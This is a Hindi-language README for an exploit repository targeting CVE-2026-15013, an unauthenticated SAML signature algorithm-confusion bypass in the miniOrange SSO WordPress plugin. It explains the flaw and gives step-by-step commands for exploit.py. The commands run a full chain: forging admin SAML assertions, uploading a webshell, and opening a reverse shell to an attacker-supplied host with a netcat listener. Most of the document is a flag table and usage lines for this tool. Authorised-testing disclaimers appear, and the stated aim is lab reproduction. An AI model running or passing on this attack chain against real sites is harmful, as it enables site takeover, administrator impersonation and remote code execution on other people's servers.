
CVE-2026-15013 के लिए एक्सप्लॉइट: एल्गोरिदम कन्फ्यूज़न के माध्यम से बिना प्रमाणीकरण (unauthenticated) SAML ऑथ बाइपास। प्रशासक (admin) पहुँच प्राप्त करने और webshell/reverse shell तैनात करने के लिए SAML प्रतिक्रियाओं को जाली बनाता है। केवल अधिकृत परीक्षण के लिए।
CVE-2026-15013 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: miniOrange SAML Single Sign On – SSO Login WordPress प्लगइन (संस्करण 5.4.3 तक, समावेशी) में SAML सिग्नेचर एल्गोरिथम कन्फ्यूजन (HMAC-SHA1) के माध्यम से बिना प्रमाणीकरण के ऑथेंटिकेशन बायपास।
केवल अधिकृत परीक्षण। इस कोड का उपयोग केवल उन्हीं सिस्टमों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। कंप्यूटर सिस्टमों तक अनधिकृत पहुँच अवैध है।
| भूमिका | |
|---|---|
| भेद्यता खोजकर्ता | lhking (CVE रिकॉर्ड में श्रेय) |
| CVE / CNA | Wordfence |
| यह रिपॉजिटरी | स्वतंत्र प्रयोगशाला पुनरुत्पादन / PoC स्वचालन (मूल खोज नहीं) |
CVE रिकॉर्ड: https://www.cve.org/CVERecord?id=CVE-2026-15013
Mo_SAML_Utilities::mo_saml_cast_key() हमलावर-नियंत्रित SAMLResponse से SignatureMethod एल्गोरिथम पर भरोसा करता है। जब इसे HMAC-SHA1 पर सेट किया जाता है, तो प्लगइन IdP की RSA सार्वजनिक कुंजी को HMAC साझा रहस्य के रूप में पुनः व्याख्यायित करता है और इसी के साथ हस्ताक्षर सत्यापित करता है। जो कोई भी IdP प्रमाणपत्र (अक्सर सार्वजनिक मेटाडेटा) पढ़ सकता है, वह किसी भी मौजूदा WordPress उपयोगकर्ता — जिसमें व्यवस्थापक भी शामिल हैं — के लिए एक वैध assertion जाली बना सकता है।
5.4.4+ में पैच किया गया (असुरक्षित एल्गोरिथम / HMAC अस्वीकृत)।
9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
openssl CLI (प्रमाणपत्र से सार्वजनिक कुंजी निकालने के लिए)निर्भरताएँ स्थापित करें:
pip install -r requirements.txt
पूर्ण श्रृंखला (enum, HMAC लॉगिन, admin, वेबशेल):
python3 exploit.py -u https://TARGET.example
वैकल्पिक रिवर्स शेल (पहले listener प्रारंभ करें: nc -lvnp 4444):
python3 exploit.py -u https://TARGET.example --lhost YOUR_IP --lport 4444
केवल लॉगिन (शेल नहीं):
python3 exploit.py -u https://TARGET.example --no-shell
मैन्युअल ओवरराइड:
python3 exploit.py -u https://TARGET.example \
--issuer https://idp.example/realms/xxx \
--nameid admin \
-k ./idp-pubkey.pem
| Flag | विवरण |
|---|---|
-u, --url | WordPress आधार URL (आवश्यक) |
-k, --hmac-key | PEM सार्वजनिक कुंजी या प्रमाणपत्र फ़ाइल; खाली होने पर IdP मेटाडेटा से प्राप्त करें |
--issuer | IdP issuer ओवरराइड करें |
--acs | ACS URL ओवरराइड करें |
--nameid | एकल WordPress उपयोगकर्ता-नाम बाध्य करें |
--lhost / --lport | रिवर्स शेल कॉलबैक (डिफ़ॉल्ट पोर्ट 4444) |
--no-shell | admin सत्र के बाद रुकें |
--no-reverse | शेल अपलोड करें लेकिन रिवर्स ट्रिगर न करें |
exp/shell.php?c=id)--lhost के माध्यम से वैकल्पिक रिवर्स शेलयह परियोजना केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए है। लेखक और योगदानकर्ता दुरुपयोग के लिए उत्तरदायी नहीं हैं। तृतीय-पक्ष सिस्टमों का परीक्षण करने से पहले हमेशा लिखित अनुमति प्राप्त करें। मूल भेद्यता की सूचना जिम्मेदार प्रकटीकरण (responsible disclosure) के माध्यम से दी गई थी; यह रिपॉजिटरी केवल सीखने और बचाव सत्यापन के लिए पुनरुत्पादन प्रदर्शित करती है।
शोध उपयोग के लिए। कोई वारंटी नहीं।